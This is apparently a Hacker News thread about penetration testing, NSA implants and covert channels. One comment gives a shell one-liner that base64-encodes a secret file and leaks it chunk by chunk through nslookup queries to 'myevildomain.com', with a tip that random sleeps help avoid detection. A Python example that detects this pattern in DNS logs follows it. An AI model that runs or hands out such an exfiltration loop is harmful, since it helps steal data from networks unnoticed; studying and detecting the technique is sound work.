by sillysaurusx 2098 days ago
Ok, I'll tell you how it goes in the real world. I worked for a somewhat HN-famous pentesting company several years ago.

"So, X has been infiltrating <company> for the past few days."

"Really? <company>? <famous company>?"

"Yep. We're keeping them looped in on everything, and they told us to try to get as far as possible. Apparently they were running <outdated version> of <software> on one of their boxes, and <scanner> picked it up."

"That actually happens?"

"He's <highly surprising claim> right now. You'd be surprised how far you can get, jumping from one box to another."

I can't give much more detail than that, for obvious reasons, but the reality is that it's very methodical, very "boring" work. It's basically a giant matrix of probabilities: there are hundreds of thousands of attack vectors, and your job is to tap as many as possible, sorted by probability of effectiveness, until something sticks. Then use your head to get further, adapting to the situation on the fly.

And ... writing reports. Jesus, if someone had told me that 70% of your day would be spent writing reports, I probably wouldn't have joined. But the 30% of other stuff made up for it.

That feeling you get when you break into somewhere you're not supposed to be, and that you were paid to do it, is amazing. The rules change from engagement to engagement, but usually it's "do whatever you want, but don't modify any data, i.e. no destructive actions, and all info you've collected will be deleted at the end of the engagement."

Must be interesting to be a spook in the NSA doing that kind of stuff offensively.

Also, it might seem absurd that I'm comparing this story to the most elite hackers in the developed world. And maybe it is. But if you knew which <company> it was, and exactly what <highly surprising claim> was, you'd be shocked that one or two smart developers poking at internals were able to compromise the entire corporate network of <famous company>, to the point of being able to... well. Let's just say, I wish I could say. It's a weird feeling, seeing it with my own eyes, knowing it's true, and never being able to talk fully about it. :)

So I imagine the NSA spooks are doing similarly methodical work, with some cheat codes like "we intercepted their computer before delivery and installed a backdoor that only activates when we send a specially malformed packet that would normally be dropped and is therefore invisible, which grants us access as needed."


> [...] a specially malformed packet [...]

As far as I understand, error-correcting codes can be and are used at different levels of communication protocols (hardware at each link, hardware at the endpoints, software at the endpoints, ...).

I often wonder if recoverable errors at the endpoints are ever used to exfiltrate data. The higher levels of the stack would see the corrected overt message, while the underlying levels (hardware or software) that perform the error correction have access to the covert information encoded in the error.

This may be testable with an FPGA, sorting connections by protocol, origin, destination, ... to identify connections with a suspiciously high number of ECC-recoverable errors compared to the rest.

This may be very hard to test if MitM'ed (by ISP, network card manufacturer, ...) such that benign packets get recoverable errors introduced as well (to hide the malicious ones in the noise), which would increase the complexity since now the malicious hardware or software at the endpoints needs to discriminate artificial errors from covert messages over the error channel. There would be many ways of going about this.

If the cheat codes were along the lines of "as long as they're using anyone's routers but Huawei's" they would not even require interception and customisation.

I wish I understood it better, because it's a real technique that the NSA uses, as far as I know. And I agree that it seems like it shouldn't be that simple.

Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.

I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.

But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)

They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.

https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it in to the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).

Extremely monitored systems should probably communicate by tape, or CD-ROM, or a similar write-mostly data diode medium. I've heard the US launch network was updated mostly via paper tape for a long time. Today it occurred to me that people could, in principle, hand-verify that two short paper tapes were identical, without needing to trust the integrity of any technological black boxes.

> you'd be able to `nslookup foo.com <your special server>` on

You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.

Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server I ran on my colocated rack to allow me to surf the wider web when my laptop was connected to Wi-Fi captive portals.

The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).

It was slow though... I think I maxed out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web surfing.


> Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server

It's even easier than that if you just want to sneak a relatively small file out.

    for n in $(base64 mysecretfile|sed  's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.
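The flip side of that loop is what the "anyone paying attention to those logs" would look for. The following is an added example, not code from any commenter: it scans a constructed DNS query log (the format and all query names are made up for this example) and flags domains whose queries all carry long, high-entropy, never-repeating labels, which is the signature the `nslookup` loop above leaves behind. The thresholds and the naive registered-domain split are assumptions to tune for a real resolver's logs.

```python
import math
from collections import defaultdict

# Constructed sample DNS query log, one query per line: "<epoch> <client> <qname> <qtype>".
# The three long labels under myevildomain.com are hand-made base64-looking chunks, not real data.
SAMPLE_LOG = """\
1700000001 10.0.0.5 www.example.com A
1700000002 10.0.0.5 cdn.example.com A
1700000003 10.0.0.7 aGVsbG8gd29ybGQgdGhpcyBpcyBhIGNvbnN0cnVjdGVkIHNh.myevildomain.com A
1700000004 10.0.0.7 bXBsZSBsaW5lIG9mIGRhdGEgYmVpbmcgc211Z2dsZWQgb3V0.myevildomain.com A
1700000005 10.0.0.7 IGluIHNtYWxsIHBpZWNlcyBvdmVyIEROUyBxdWVyaWVzLgo0.myevildomain.com A
1700000006 10.0.0.9 mail.example.com MX
"""

def shannon_entropy(s):
    """Bits per character: roughly 4 or more for base64 chunks, low for ordinary hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def registered_domain(qname):
    """Naive split: last two labels. Assumption: no public-suffix handling (co.uk etc.)."""
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-2:])

def flag_exfil_domains(log_text, min_queries=3, min_label_len=40, min_entropy=3.5):
    """Return {domain: stats} for domains whose every query looks like an encoded payload chunk."""
    per_domain = defaultdict(lambda: {"queries": 0, "long_label_queries": 0,
                                      "entropy_sum": 0.0, "payload_chars": 0, "subdomains": set()})
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line; a real parser would count or log it
        qname = fields[2].rstrip(".")
        domain = registered_domain(qname)
        labels = qname.split(".")[:-2]          # everything left of the registered domain
        longest = max(labels, key=len, default="")
        st = per_domain[domain]
        st["queries"] += 1
        st["subdomains"].add(".".join(labels))
        st["payload_chars"] += sum(len(l) for l in labels)
        st["entropy_sum"] += shannon_entropy(longest)
        if len(longest) >= min_label_len:
            st["long_label_queries"] += 1
    flagged = {}
    for domain, st in per_domain.items():
        if st["queries"] < min_queries:
            continue
        avg_entropy = st["entropy_sum"] / st["queries"]
        # Long, high-entropy, never-repeated labels on every query: the pattern of the loop above.
        if (st["long_label_queries"] == st["queries"] and avg_entropy >= min_entropy
                and len(st["subdomains"]) == st["queries"]):
            flagged[domain] = {"queries": st["queries"], "avg_entropy": round(avg_entropy, 2),
                               "payload_chars": st["payload_chars"]}
    return flagged
```

The random sleeps mentioned above defeat a pure rate threshold, which is why this looks at label shape and uniqueness per domain rather than queries per second.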

Circumstantial language (suggesting simplicity) in the 2020 defense appropriations bill, note "cyber" and "collection":

https://www.congress.gov/bill/116th-congress/senate-bill/179...

§ 5707 (c)(2): "the implications of [5G] global and regional adoption on the cyber and espionage threat to the United States, the interests of the United States, and the cyber and collection capabilities of the United States;"